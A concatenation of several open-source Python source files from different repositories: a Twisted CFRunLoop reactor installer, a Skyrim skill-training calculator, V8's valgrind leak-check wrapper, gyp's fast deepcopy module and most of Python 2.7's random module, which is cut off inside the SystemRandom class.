def install(runLoop=None, runner=None):
    """
    Configure the twisted mainloop to be run inside CFRunLoop.
    @param runLoop: the run loop to use.
    @param runner: the function to call in order to actually invoke the main
        loop. This will default to L{CFRunLoopRun} if not specified. However,
        this is not an appropriate choice for GUI applications, as you need to
        run NSApplicationMain (or something like it). For example, to run the
        Twisted mainloop in a PyObjC application, your C{main.py} should look
        something like this::
            from PyObjCTools import AppHelper
            from twisted.internet.cfreactor import install
            install(runner=AppHelper.runEventLoop)
            # initialize your application
            reactor.run()
    @return: The installed reactor.
    @rtype: L{CFReactor}
    """
    reactor = CFReactor(runLoop=runLoop, runner=runner)
    # Imported here rather than at module top, presumably to avoid importing
    # twisted.internet.main before the reactor choice is made -- confirm
    # before hoisting this import.
    from twisted.internet.main import installReactor
    installReactor(reactor)
    return reactor
| apache-2.0 |
Mailea/detailed-skyrim-calculator | skycalc/calculator.py | 2 | 4763 | """Calculate optimal training strategies to reach a certain character level.
3 Versions: fast, easy and balanced.
"""
def simulate_training(original_skill_levels, current, goal, selected_from):
    """Simulate skill training and return resulting information.

    Attributes:
        original_skill_levels: dict containing current levels of used skills.
        current (int): current character level
        goal (int): goal level
        selected_from: selection method used for optimization; a callable
            that receives the skill data dict and returns the name of the
            skill to train next.

    Returns:
        dict mapping each skill name to a dict with the keys
        "Start Level", "Times Leveled", "Times Legendary" and "Final Level".
    """

    def make_result_dict(original_dict):
        """Return a fresh skill data dictionary for the given start levels."""
        return {skill: {"Start Level": level,
                        "Times Leveled": 0,
                        "Times Legendary": 0,
                        "Final Level": level}
                for skill, level in original_dict.items()}

    def total_xp(current_lvl, goal_lvl):
        """Return xp needed to advance from a current level to a goal level.

        Attributes:
            current_lvl (int): current character level
            goal_lvl (int): goal level
        """
        # Each level-up from character level L costs (L + 3) * 25 xp.
        return sum((lvl + 3) * 25 for lvl in range(current_lvl, goal_lvl))

    def train(data, skill):
        """Update data in place as if the given skill was trained once."""
        if data[skill]["Final Level"] == 100:
            # 'Make legendary': a maxed skill resets to level 16 so it can
            # be trained again.  Bug fix: this event was previously never
            # counted, so "Times Legendary" always stayed 0 in the results.
            data[skill]["Final Level"] = 16
            data[skill]["Times Legendary"] += 1
        else:
            data[skill]["Final Level"] += 1
        data[skill]["Times Leveled"] += 1

    needed_xp = total_xp(current, goal)
    skill_data = make_result_dict(original_skill_levels)
    while needed_xp > 0:
        selected_skill = selected_from(skill_data)
        train(skill_data, selected_skill)
        # Training a skill grants character xp equal to the skill level
        # that was just reached.
        needed_xp -= skill_data[selected_skill]["Final Level"]
    return skill_data
def simulate_balanced_training(original_skill_levels,
                               current_level, goal_level):
    """Return skill training data for a balanced training method.

    Every skill is trained equally often.

    Attributes:
        original_skill_levels: dict containing current levels of used skills.
        current_level (int): current character level
        goal_level (int): goal level
    """
    def least_leveled(skill_dict):
        """Return the skill that has been trained the fewest times."""
        return min(skill_dict,
                   key=lambda skill: skill_dict[skill]["Times Leveled"])
    return simulate_training(original_skill_levels,
                             current_level, goal_level,
                             least_leveled)
def simulate_easy_training(original_skill_levels, current_level, goal_level):
    """Return skill training data for the easiest possible training.

    Always level the skill that is currently easiest to train.

    Attributes:
        original_skill_levels: dict containing current levels of used skills.
        current_level (int): current character level
        goal_level (int): goal level
    """
    def lowest(skill_dict):
        """Return the skill whose final level is currently the lowest."""
        return min(skill_dict,
                   key=lambda skill: skill_dict[skill]["Final Level"])
    return simulate_training(original_skill_levels,
                             current_level, goal_level,
                             lowest)
def simulate_fast_training(original_skill_levels, current_level, goal_level):
    """Return skill training data for the fastest possible training.

    Always train the skill that yields the most xp per training.

    Attributes:
        original_skill_levels: dict containing current levels of used skills.
        current_level (int): current character level
        goal_level (int): goal level
    """
    def highest(skill_dict):
        """Return the skill whose final level is currently the highest."""
        return max(skill_dict,
                   key=lambda skill: skill_dict[skill]["Final Level"])
    return simulate_training(original_skill_levels,
                             current_level, goal_level,
                             highest)
if __name__ == "__main__":
    # This module only provides simulation helpers; running it directly
    # just prints the module docstring and a usage note.
    print(__doc__, "Not meant to be used as main.")
| mit |
indashnet/InDashNet.Open.UN2000 | android/external/chromium_org/v8/tools/run-valgrind.py | 92 | 2874 | #!/usr/bin/env python
#
# Copyright 2009 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Simple wrapper for running valgrind and checking the output on
# stderr for memory leaks.
import subprocess
import sys
import re
# Valgrind invocation: exit non-zero on any error, report full leak
# details, and check all self-modifying code (V8 JIT-generates code).
VALGRIND_ARGUMENTS = [
  'valgrind',
  '--error-exitcode=1',
  '--leak-check=full',
  '--smc-check=all'
]
# Compute the command line.
command = VALGRIND_ARGUMENTS + sys.argv[1:]
# Run valgrind.
process = subprocess.Popen(command, stderr=subprocess.PIPE)
code = process.wait();
errors = process.stderr.readlines();
# If valgrind produced an error, we report that to the user.
if code != 0:
  sys.stderr.writelines(errors)
  sys.exit(code)
# Look through the leak details and make sure that we don't
# have any definitely, indirectly, and possibly lost bytes.
LEAK_RE = r"(?:definitely|indirectly|possibly) lost: "
LEAK_LINE_MATCHER = re.compile(LEAK_RE)
LEAK_OKAY_MATCHER = re.compile(r"lost: 0 bytes in 0 blocks")
leaks = []
for line in errors:
  if LEAK_LINE_MATCHER.search(line):
    leaks.append(line)
    # Any "lost:" summary line that is not exactly zero is a real leak.
    if not LEAK_OKAY_MATCHER.search(line):
      sys.stderr.writelines(errors)
      sys.exit(1)
# Make sure we found between 2 and 3 leak lines.
# (Fewer or more suggests valgrind's output format changed and the
# checks above may not have seen what they expected.)
if len(leaks) < 2 or len(leaks) > 3:
  sys.stderr.writelines(errors)
  sys.stderr.write('\n\n#### Malformed valgrind output.\n#### Exiting.\n')
  sys.exit(1)
# No leaks found.
sys.exit(0)
| apache-2.0 |
pombredanne/pangyp | gyp/pylib/gyp/simple_copy.py | 1869 | 1247 | # Copyright 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A clone of the default copy.deepcopy that doesn't handle cyclic
structures or complex types except for dicts and lists. This is
because gyp copies so large structure that small copy overhead ends up
taking seconds in a project the size of Chromium."""
class Error(Exception):
  """Raised when deepcopy() is asked to copy an unsupported type."""
  pass
# Public API of this module.
__all__ = ["Error", "deepcopy"]
def deepcopy(x):
  """Deep copy operation on gyp objects such as strings, ints, dicts
  and lists. More than twice as fast as copy.deepcopy but much less
  generic.

  Raises:
    Error: if x (or a value nested inside it) has an unsupported type.
  """
  try:
    copier = _deepcopy_dispatch[type(x)]
  except KeyError:
    # Bug fix: the original code joined the two message halves with '+'
    # but applied '%' only to the second literal (operator precedence),
    # which has no '%s' placeholder -- so reporting an unsupported type
    # raised TypeError instead of the intended Error.  Implicit string
    # literal concatenation formats the whole message correctly.
    raise Error('Unsupported type %s for deepcopy. Use copy.deepcopy '
                'or expand simple_copy support.' % type(x))
  # Dispatch outside the try block so a KeyError raised while copying a
  # supported container is not misreported as an unsupported type.
  return copier(x)
# Maps type -> copier function; 'd' is just a short alias used while the
# table is being populated.
_deepcopy_dispatch = d = {}
def _deepcopy_atomic(x):
  # Immutable values can safely be shared; return the object itself.
  return x
# NOTE: 'long' and 'unicode' exist on Python 2 only; this module targets 2.x.
for x in (type(None), int, long, float,
          bool, str, unicode, type):
  d[x] = _deepcopy_atomic
def _deepcopy_list(x):
  return [deepcopy(a) for a in x]
d[list] = _deepcopy_list
def _deepcopy_dict(x):
  y = {}
  for key, value in x.iteritems():
    # Keys are copied too: they may be tuples/strings built by gyp.
    y[deepcopy(key)] = deepcopy(value)
  return y
d[dict] = _deepcopy_dict
del d
| mit |
sdphome/UHF_Reader | rfs/rootfs/usr/lib/python2.7/random.py | 53 | 32323 | """Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
distributions on the circle (angles 0 to 2pi)
---------------------------------------------
circular uniform
von Mises
General notes on the underlying Mersenne Twister core generator:
* The period is 2**19937-1.
* It is one of the most extensively tested generators in existence.
* Without a direct way to compute N steps forward, the semantics of
jumpahead(n) are weakened to simply jump to another distant state and rely
on the large period to avoid overlapping sequences.
* The random() method is implemented in C, executes in a single Python step,
and is, therefore, threadsafe.
"""
from __future__ import division
from warnings import warn as _warn
from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType
from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil
from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin
from os import urandom as _urandom
from binascii import hexlify as _hexlify
import hashlib as _hashlib
# Names exported by 'from random import *'.
__all__ = ["Random","seed","random","uniform","randint","choice","sample",
           "randrange","shuffle","normalvariate","lognormvariate",
           "expovariate","vonmisesvariate","gammavariate","triangular",
           "gauss","betavariate","paretovariate","weibullvariate",
           "getstate","setstate","jumpahead", "WichmannHill", "getrandbits",
           "SystemRandom"]
# Precomputed constants used by the distribution methods below.
NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0)   # Kinderman-Monahan rejection bound
TWOPI = 2.0*_pi
LOG4 = _log(4.0)
SG_MAGICCONST = 1.0 + _log(4.5)             # Cheng's gamma-variate constant
BPF = 53        # Number of bits in a float
RECIP_BPF = 2**-BPF
# Translated by Guido van Rossum from C source provided by
# Adrian Baddeley.  Adapted by Raymond Hettinger for use with
# the Mersenne Twister  and os.urandom() core generators.
import _random
class Random(_random.Random):
    """Random number generator base class used by bound module functions.

    Used to instantiate instances of Random to get generators that don't
    share state.  Especially useful for multi-threaded programs, creating
    a different instance of Random for each thread, and using the jumpahead()
    method to ensure that the generated sequences seen by each thread don't
    overlap.

    Class Random can also be subclassed if you want to use a different basic
    generator of your own devising: in that case, override the following
    methods:  random(), seed(), getstate(), setstate() and jumpahead().
    Optionally, implement a getrandbits() method so that randrange() can cover
    arbitrarily large ranges.
    """

    VERSION = 3     # used by getstate/setstate

    def __init__(self, x=None):
        """Initialize an instance.

        Optional argument x controls seeding, as for Random.seed().
        """

        self.seed(x)
        self.gauss_next = None

    def seed(self, a=None):
        """Initialize internal state from hashable object.

        None or no argument seeds from current time or from an operating
        system specific randomness source if available.

        If a is not None or an int or long, hash(a) is used instead.
        """

        if a is None:
            try:
                # Seed with enough bytes to span the 19937 bit
                # state space for the Mersenne Twister
                a = long(_hexlify(_urandom(2500)), 16)
            except NotImplementedError:
                import time
                a = long(time.time() * 256) # use fractional seconds

        super(Random, self).seed(a)
        self.gauss_next = None

    def getstate(self):
        """Return internal state; can be passed to setstate() later."""
        return self.VERSION, super(Random, self).getstate(), self.gauss_next

    def setstate(self, state):
        """Restore internal state from object returned by getstate()."""
        version = state[0]
        if version == 3:
            version, internalstate, self.gauss_next = state
            super(Random, self).setstate(internalstate)
        elif version == 2:
            version, internalstate, self.gauss_next = state
            # In version 2, the state was saved as signed ints, which causes
            #   inconsistencies between 32/64-bit systems. The state is
            #   really unsigned 32-bit ints, so we convert negative ints from
            #   version 2 to positive longs for version 3.
            try:
                internalstate = tuple( long(x) % (2**32) for x in internalstate )
            except ValueError, e:
                raise TypeError, e
            super(Random, self).setstate(internalstate)
        else:
            raise ValueError("state with version %s passed to "
                             "Random.setstate() of version %s" %
                             (version, self.VERSION))

    def jumpahead(self, n):
        """Change the internal state to one that is likely far away
        from the current state.  This method will not be in Py3.x,
        so it is better to simply reseed.
        """
        # The super.jumpahead() method uses shuffling to change state,
        # so it needs a large and "interesting" n to work with.  Here,
        # we use hashing to create a large n for the shuffle.
        s = repr(n) + repr(self.getstate())
        n = int(_hashlib.new('sha512', s).hexdigest(), 16)
        super(Random, self).jumpahead(n)

## ---- Methods below this point do not need to be overridden when
## ---- subclassing for the purpose of using a different core generator.

## -------------------- pickle support  -------------------

    def __getstate__(self): # for pickle
        return self.getstate()

    def __setstate__(self, state):  # for pickle
        self.setstate(state)

    def __reduce__(self):
        return self.__class__, (), self.getstate()

## -------------------- integer methods  -------------------

    def randrange(self, start, stop=None, step=1, _int=int, _maxwidth=1L<<BPF):
        """Choose a random item from range(start, stop[, step]).

        This fixes the problem with randint() which includes the
        endpoint; in Python this is usually not what you want.

        The _int and _maxwidth arguments are internal speed/width
        hacks and should not be supplied by callers.
        """

        # This code is a bit messy to make it fast for the
        # common case while still doing adequate error checking.
        istart = _int(start)
        if istart != start:
            raise ValueError, "non-integer arg 1 for randrange()"
        if stop is None:
            if istart > 0:
                if istart >= _maxwidth:
                    return self._randbelow(istart)
                return _int(self.random() * istart)
            raise ValueError, "empty range for randrange()"

        # stop argument supplied.
        istop = _int(stop)
        if istop != stop:
            raise ValueError, "non-integer stop for randrange()"
        width = istop - istart
        if step == 1 and width > 0:
            # Note that
            #     int(istart + self.random()*width)
            # instead would be incorrect.  For example, consider istart
            # = -2 and istop = 0.  Then the guts would be in
            # -2.0 to 0.0 exclusive on both ends (ignoring that random()
            # might return 0.0), and because int() truncates toward 0, the
            # final result would be -1 or 0 (instead of -2 or -1).
            #     istart + int(self.random()*width)
            # would also be incorrect, for a subtler reason:  the RHS
            # can return a long, and then randrange() would also return
            # a long, but we're supposed to return an int (for backward
            # compatibility).

            if width >= _maxwidth:
                return _int(istart + self._randbelow(width))
            return _int(istart + _int(self.random()*width))
        if step == 1:
            raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width)

        # Non-unit step argument supplied.
        istep = _int(step)
        if istep != step:
            raise ValueError, "non-integer step for randrange()"
        if istep > 0:
            n = (width + istep - 1) // istep
        elif istep < 0:
            n = (width + istep + 1) // istep
        else:
            raise ValueError, "zero step for randrange()"

        if n <= 0:
            raise ValueError, "empty range for randrange()"

        if n >= _maxwidth:
            return istart + istep*self._randbelow(n)
        return istart + istep*_int(self.random() * n)

    def randint(self, a, b):
        """Return random integer in range [a, b], including both end points.
        """

        return self.randrange(a, b+1)

    def _randbelow(self, n, _log=_log, _int=int, _maxwidth=1L<<BPF,
                   _Method=_MethodType, _BuiltinMethod=_BuiltinMethodType):
        """Return a random int in the range [0,n)

        Handles the case where n has more bits than returned
        by a single call to the underlying generator.
        """

        try:
            getrandbits = self.getrandbits
        except AttributeError:
            pass
        else:
            # Only call self.getrandbits if the original random() builtin method
            # has not been overridden or if a new getrandbits() was supplied.
            # This assures that the two methods correspond.
            if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method:
                k = _int(1.00001 + _log(n-1, 2.0))   # 2**k > n-1 > 2**(k-2)
                r = getrandbits(k)
                # Rejection sampling: retry until the k-bit value falls
                # inside [0, n) so results stay uniformly distributed.
                while r >= n:
                    r = getrandbits(k)
                return r
        if n >= _maxwidth:
            _warn("Underlying random() generator does not supply \n"
                "enough bits to choose from a population range this large")
        return _int(self.random() * n)

## -------------------- sequence methods  -------------------

    def choice(self, seq):
        """Choose a random element from a non-empty sequence."""
        return seq[int(self.random() * len(seq))]  # raises IndexError if seq is empty

    def shuffle(self, x, random=None):
        """x, random=random.random -> shuffle list x in place; return None.

        Optional arg random is a 0-argument function returning a random
        float in [0.0, 1.0); by default, the standard random.random.

        """
        # Fisher-Yates shuffle, iterating from the tail of the list.
        if random is None:
            random = self.random
        _int = int
        for i in reversed(xrange(1, len(x))):
            # pick an element in x[:i+1] with which to exchange x[i]
            j = _int(random() * (i+1))
            x[i], x[j] = x[j], x[i]

    def sample(self, population, k):
        """Chooses k unique random elements from a population sequence.

        Returns a new list containing elements from the population while
        leaving the original population unchanged.  The resulting list is
        in selection order so that all sub-slices will also be valid random
        samples.  This allows raffle winners (the sample) to be partitioned
        into grand prize and second place winners (the subslices).

        Members of the population need not be hashable or unique.  If the
        population contains repeats, then each occurrence is a possible
        selection in the sample.

        To choose a sample in a range of integers, use xrange as an argument.
        This is especially fast and space efficient for sampling from a
        large population:   sample(xrange(10000000), 60)
        """

        # Sampling without replacement entails tracking either potential
        # selections (the pool) in a list or previous selections in a set.

        # When the number of selections is small compared to the
        # population, then tracking selections is efficient, requiring
        # only a small set and an occasional reselection.  For
        # a larger number of selections, the pool tracking method is
        # preferred since the list takes less space than the
        # set and it doesn't suffer from frequent reselections.

        n = len(population)
        if not 0 <= k <= n:
            raise ValueError("sample larger than population")
        random = self.random
        _int = int
        result = [None] * k
        setsize = 21        # size of a small set minus size of an empty list
        if k > 5:
            setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets
        if n <= setsize or hasattr(population, "keys"):
            # An n-length list is smaller than a k-length set, or this is a
            # mapping type so the other algorithm wouldn't work.
            pool = list(population)
            for i in xrange(k):         # invariant:  non-selected at [0,n-i)
                j = _int(random() * (n-i))
                result[i] = pool[j]
                pool[j] = pool[n-i-1]   # move non-selected item into vacancy
        else:
            try:
                selected = set()
                selected_add = selected.add
                for i in xrange(k):
                    j = _int(random() * n)
                    while j in selected:
                        j = _int(random() * n)
                    selected_add(j)
                    result[i] = population[j]
            except (TypeError, KeyError):   # handle (at least) sets
                if isinstance(population, list):
                    raise
                return self.sample(tuple(population), k)
        return result

## -------------------- real-valued distributions  -------------------

## -------------------- uniform distribution -------------------

    def uniform(self, a, b):
        "Get a random number in the range [a, b) or [a, b] depending on rounding."
        return a + (b-a) * self.random()

## -------------------- triangular --------------------

    def triangular(self, low=0.0, high=1.0, mode=None):
        """Triangular distribution.

        Continuous distribution bounded by given lower and upper limits,
        and having a given mode value in-between.

        http://en.wikipedia.org/wiki/Triangular_distribution

        """
        u = self.random()
        try:
            c = 0.5 if mode is None else (mode - low) / (high - low)
        except ZeroDivisionError:
            # Degenerate case: low == high, every draw is that value.
            return low
        if u > c:
            u = 1.0 - u
            c = 1.0 - c
            low, high = high, low
        return low + (high - low) * (u * c) ** 0.5

## -------------------- normal distribution --------------------

    def normalvariate(self, mu, sigma):
        """Normal distribution.

        mu is the mean, and sigma is the standard deviation.

        """
        # mu = mean, sigma = standard deviation

        # Uses Kinderman and Monahan method. Reference: Kinderman,
        # A.J. and Monahan, J.F., "Computer generation of random
        # variables using the ratio of uniform deviates", ACM Trans
        # Math Software, 3, (1977), pp257-260.

        random = self.random
        while 1:
            u1 = random()
            u2 = 1.0 - random()
            z = NV_MAGICCONST*(u1-0.5)/u2
            zz = z*z/4.0
            if zz <= -_log(u2):
                break
        return mu + z*sigma

## -------------------- lognormal distribution --------------------

    def lognormvariate(self, mu, sigma):
        """Log normal distribution.

        If you take the natural logarithm of this distribution, you'll get a
        normal distribution with mean mu and standard deviation sigma.
        mu can have any value, and sigma must be greater than zero.

        """
        return _exp(self.normalvariate(mu, sigma))

## -------------------- exponential distribution --------------------

    def expovariate(self, lambd):
        """Exponential distribution.

        lambd is 1.0 divided by the desired mean.  It should be
        nonzero.  (The parameter would be called "lambda", but that is
        a reserved word in Python.)  Returned values range from 0 to
        positive infinity if lambd is positive, and from negative
        infinity to 0 if lambd is negative.

        """
        # lambd: rate lambd = 1/mean
        # ('lambda' is a Python reserved word)

        # we use 1-random() instead of random() to preclude the
        # possibility of taking the log of zero.
        return -_log(1.0 - self.random())/lambd

## -------------------- von Mises distribution --------------------

    def vonmisesvariate(self, mu, kappa):
        """Circular data distribution.

        mu is the mean angle, expressed in radians between 0 and 2*pi, and
        kappa is the concentration parameter, which must be greater than or
        equal to zero.  If kappa is equal to zero, this distribution reduces
        to a uniform random angle over the range 0 to 2*pi.

        """
        # mu:    mean angle (in radians between 0 and 2*pi)
        # kappa: concentration parameter kappa (>= 0)
        # if kappa = 0 generate uniform random angle

        # Based upon an algorithm published in: Fisher, N.I.,
        # "Statistical Analysis of Circular Data", Cambridge
        # University Press, 1993.

        # Thanks to Magnus Kessler for a correction to the
        # implementation of step 4.

        random = self.random
        if kappa <= 1e-6:
            return TWOPI * random()

        s = 0.5 / kappa
        r = s + _sqrt(1.0 + s * s)

        while 1:
            u1 = random()
            z = _cos(_pi * u1)

            d = z / (r + z)
            u2 = random()
            if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d):
                break

        q = 1.0 / r
        f = (q + z) / (1.0 + q * z)
        u3 = random()
        if u3 > 0.5:
            theta = (mu + _acos(f)) % TWOPI
        else:
            theta = (mu - _acos(f)) % TWOPI

        return theta

## -------------------- gamma distribution --------------------

    def gammavariate(self, alpha, beta):
        """Gamma distribution.  Not the gamma function!

        Conditions on the parameters are alpha > 0 and beta > 0.

        The probability distribution function is:

                    x ** (alpha - 1) * math.exp(-x / beta)
          pdf(x) =  --------------------------------------
                      math.gamma(alpha) * beta ** alpha

        """

        # alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2

        # Warning: a few older sources define the gamma distribution in terms
        # of alpha > -1.0
        if alpha <= 0.0 or beta <= 0.0:
            raise ValueError, 'gammavariate: alpha and beta must be > 0.0'

        random = self.random
        if alpha > 1.0:

            # Uses R.C.H. Cheng, "The generation of Gamma
            # variables with non-integral shape parameters",
            # Applied Statistics, (1977), 26, No. 1, p71-74

            ainv = _sqrt(2.0 * alpha - 1.0)
            bbb = alpha - LOG4
            ccc = alpha + ainv

            while 1:
                u1 = random()
                if not 1e-7 < u1 < .9999999:
                    continue
                u2 = 1.0 - random()
                v = _log(u1/(1.0-u1))/ainv
                x = alpha*_exp(v)
                z = u1*u1*u2
                r = bbb+ccc*v-x
                if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
                    return x * beta

        elif alpha == 1.0:
            # expovariate(1)
            u = random()
            while u <= 1e-7:
                u = random()
            return -_log(u) * beta

        else:   # alpha is between 0 and 1 (exclusive)

            # Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle

            while 1:
                u = random()
                b = (_e + alpha)/_e
                p = b*u
                if p <= 1.0:
                    x = p ** (1.0/alpha)
                else:
                    x = -_log((b-p)/alpha)
                u1 = random()
                if p > 1.0:
                    if u1 <= x ** (alpha - 1.0):
                        break
                elif u1 <= _exp(-x):
                    break
            return x * beta

## -------------------- Gauss (faster alternative) --------------------

    def gauss(self, mu, sigma):
        """Gaussian distribution.

        mu is the mean, and sigma is the standard deviation.  This is
        slightly faster than the normalvariate() function.

        Not thread-safe without a lock around calls.

        """

        # When x and y are two variables from [0, 1), uniformly
        # distributed, then
        #
        #    cos(2*pi*x)*sqrt(-2*log(1-y))
        #    sin(2*pi*x)*sqrt(-2*log(1-y))
        #
        # are two *independent* variables with normal distribution
        # (mu = 0, sigma = 1).
        # (Lambert Meertens)
        # (corrected version; bug discovered by Mike Miller, fixed by LM)

        # Multithreading note: When two threads call this function
        # simultaneously, it is possible that they will receive the
        # same return value.  The window is very small though.  To
        # avoid this, you have to use a lock around all calls.  (I
        # didn't want to slow this down in the serial case by using a
        # lock here.)

        random = self.random
        z = self.gauss_next
        self.gauss_next = None
        if z is None:
            x2pi = random() * TWOPI
            g2rad = _sqrt(-2.0 * _log(1.0 - random()))
            z = _cos(x2pi) * g2rad
            # Cache the second independent deviate for the next call.
            self.gauss_next = _sin(x2pi) * g2rad

        return mu + z*sigma

## -------------------- beta --------------------
## See
## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
## for Ivan Frohne's insightful analysis of why the original implementation:
##
##    def betavariate(self, alpha, beta):
##        # Discrete Event Simulation in C, pp 87-88.
##
##        y = self.expovariate(alpha)
##        z = self.expovariate(1.0/beta)
##        return z/(y+z)
##
## was dead wrong, and how it probably got that way.

    def betavariate(self, alpha, beta):
        """Beta distribution.

        Conditions on the parameters are alpha > 0 and beta > 0.
        Returned values range between 0 and 1.

        """

        # This version due to Janne Sinkkonen, and matches all the std
        # texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
        y = self.gammavariate(alpha, 1.)
        if y == 0:
            return 0.0
        else:
            return y / (y + self.gammavariate(beta, 1.))

## -------------------- Pareto --------------------

    def paretovariate(self, alpha):
        """Pareto distribution.  alpha is the shape parameter."""
        # Jain, pg. 495

        u = 1.0 - self.random()
        return 1.0 / pow(u, 1.0/alpha)

## -------------------- Weibull --------------------

    def weibullvariate(self, alpha, beta):
        """Weibull distribution.

        alpha is the scale parameter and beta is the shape parameter.

        """
        # Jain, pg. 499; bug fix courtesy Bill Arms

        u = 1.0 - self.random()
        return alpha * pow(-_log(u), 1.0/beta)
## -------------------- Wichmann-Hill -------------------
class WichmannHill(Random):
    """Legacy Wichmann-Hill generator kept for reproducibility of old
    sequences; prefer the default Mersenne Twister based Random."""

    VERSION = 1     # used by getstate/setstate

    def seed(self, a=None):
        """Initialize internal state from hashable object.

        None or no argument seeds from current time or from an operating
        system specific randomness source if available.

        If a is not None or an int or long, hash(a) is used instead.

        If a is an int or long, a is used directly.  Distinct values between
        0 and 27814431486575L inclusive are guaranteed to yield distinct
        internal states (this guarantee is specific to the default
        Wichmann-Hill generator).
        """

        if a is None:
            try:
                a = long(_hexlify(_urandom(16)), 16)
            except NotImplementedError:
                import time
                a = long(time.time() * 256) # use fractional seconds

        if not isinstance(a, (int, long)):
            a = hash(a)

        # Split the seed across the three component generators.
        a, x = divmod(a, 30268)
        a, y = divmod(a, 30306)
        a, z = divmod(a, 30322)
        self._seed = int(x)+1, int(y)+1, int(z)+1

        self.gauss_next = None

    def random(self):
        """Get the next random number in the range [0.0, 1.0)."""

        # Wichman-Hill random number generator.
        #
        # Wichmann, B. A. & Hill, I. D. (1982)
        # Algorithm AS 183:
        # An efficient and portable pseudo-random number generator
        # Applied Statistics 31 (1982) 188-190
        #
        # see also:
        #        Correction to Algorithm AS 183
        #        Applied Statistics 33 (1984) 123
        #
        #        McLeod, A. I. (1985)
        #        A remark on Algorithm AS 183
        #        Applied Statistics 34 (1985),198-200

        # This part is thread-unsafe:
        # BEGIN CRITICAL SECTION
        x, y, z = self._seed
        x = (171 * x) % 30269
        y = (172 * y) % 30307
        z = (170 * z) % 30323
        self._seed = x, y, z
        # END CRITICAL SECTION

        # Note:  on a platform using IEEE-754 double arithmetic, this can
        # never return 0.0 (asserted by Tim; proof too long for a comment).
        return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0

    def getstate(self):
        """Return internal state; can be passed to setstate() later."""
        return self.VERSION, self._seed, self.gauss_next

    def setstate(self, state):
        """Restore internal state from object returned by getstate()."""
        version = state[0]
        if version == 1:
            version, self._seed, self.gauss_next = state
        else:
            raise ValueError("state with version %s passed to "
                             "Random.setstate() of version %s" %
                             (version, self.VERSION))

    def jumpahead(self, n):
        """Act as if n calls to random() were made, but quickly.

        n is an int, greater than or equal to 0.

        Example use:  If you have 2 threads and know that each will
        consume no more than a million random numbers, create two Random
        objects r1 and r2, then do
            r2.setstate(r1.getstate())
            r2.jumpahead(1000000)
        Then r1 and r2 will use guaranteed-disjoint segments of the full
        period.
        """

        if not n >= 0:
            raise ValueError("n must be >= 0")
        # Advance each component generator n steps using modular
        # exponentiation instead of n individual multiplications.
        x, y, z = self._seed
        x = int(x * pow(171, n, 30269)) % 30269
        y = int(y * pow(172, n, 30307)) % 30307
        z = int(z * pow(170, n, 30323)) % 30323
        self._seed = x, y, z

    def __whseed(self, x=0, y=0, z=0):
        """Set the Wichmann-Hill seed from (x, y, z).

        These must be integers in the range [0, 256).
        """

        if not type(x) == type(y) == type(z) == int:
            raise TypeError('seeds must be integers')
        if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256):
            raise ValueError('seeds must be in range(0, 256)')
        if 0 == x == y == z:
            # Initialize from current time
            import time
            t = long(time.time() * 256)
            t = int((t&0xffffff) ^ (t>>24))
            t, x = divmod(t, 256)
            t, y = divmod(t, 256)
            t, z = divmod(t, 256)
        # Zero is a poor seed, so substitute 1
        self._seed = (x or 1, y or 1, z or 1)

        self.gauss_next = None

    def whseed(self, a=None):
        """Seed from hashable object's hash code.

        None or no argument seeds from current time.  It is not guaranteed
        that objects with distinct hash codes lead to distinct internal
        states.

        This is obsolete, provided for compatibility with the seed routine
        used prior to Python 2.1.  Use the .seed() method instead.
        """

        if a is None:
            self.__whseed()
            return
        a = hash(a)
        a, x = divmod(a, 256)
        a, y = divmod(a, 256)
        a, z = divmod(a, 256)
        x = (x + a) % 256 or 1
        y = (y + a) % 256 or 1
        z = (z + a) % 256 or 1
        self.__whseed(x, y, z)
## --------------- Operating System Random Source ------------------
class SystemRandom(Random):
    """Alternate random number generator using sources provided
    by the operating system (such as /dev/urandom on Unix or
    CryptGenRandom on Windows).

     Not available on all systems (see os.urandom() for details).
    """

    def random(self):
